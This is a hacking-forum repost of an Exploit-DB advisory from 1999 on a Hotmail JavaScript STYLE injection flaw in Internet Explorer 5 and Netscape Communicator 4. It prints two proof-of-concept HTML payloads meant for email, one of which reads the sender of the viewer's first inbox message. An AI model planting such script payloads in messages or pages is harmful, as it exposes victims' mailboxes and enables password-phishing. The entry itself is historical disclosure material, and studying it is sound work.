Exploit Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19492
Проверка EDB
  1. Пройдено
Автор
GEORGI GUNINSKI
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-1999-0750
Дата публикации
1999-09-13
Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE
Код:
Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability

source: https://www.securityfocus.com/bid/630/info

The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application.


The code that must be embeded in a HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE>
 
Источник
www.exploit-db.com

Похожие темы